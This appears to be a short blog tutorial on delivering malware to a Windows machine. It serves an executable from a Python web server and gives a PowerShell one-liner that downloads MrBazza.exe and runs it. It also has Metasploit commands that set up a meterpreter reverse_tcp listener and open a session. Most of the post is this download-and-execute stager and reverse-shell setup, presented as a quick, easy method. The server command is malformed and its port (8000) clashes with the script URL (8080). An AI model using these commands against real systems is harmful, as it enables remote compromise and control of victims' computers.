Here’s a simple script that will download and run an executable file from within Powershell.
First let’s serve up the file from our host machine. We can do this very quickly with python. Go to the directory where the file is stored, right click and start terminal from here. This will put you in a terminal window that is already in the directory of the file we want to serve up.
python3 -m http:server 8000
We now have a simple http server running and it is ready to serve up our malicious file.
Next create a Powershell script that will connect to this server and download the payload, then execute it.
$down = New-Object System.Net.WebClient $url = 'http://10.0.2.15:8080/MrBazza.exe'; $file = 'MrBazza.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application $exec.shellexecute($file);
In the above code we are connecting to our server and downloading the executable file. It is then saved under a designated filename, and we then execute the file. This is saved as .ps1 file.
Finally, let’s setup a meterpreter session on our host machine ready to listen out for when the program is executed.
once the metasploit console is open, we will start out session.
msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 10.0.2.15 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > exploit
This will start metasploit listening for our incoming connection.
The below screen shot shows both our open terminals, metasploit and the python server
Now, we go over to our windows machine, and we run our Powershell script. It will connect to our host web server, download and execute the file.
If we go back to our linux machine, we can see the logs of the python web server indicate the connection and downloading of the file, and we have our meterpreter session started. We can get details on the machine by using
meterpreter > sysinfo
So there is a quick and easy way to setup a web server with python, and serve up files that are automatically downloaded and executed using a Powershell script.
One thought on “Powershell – Download and execute .exe”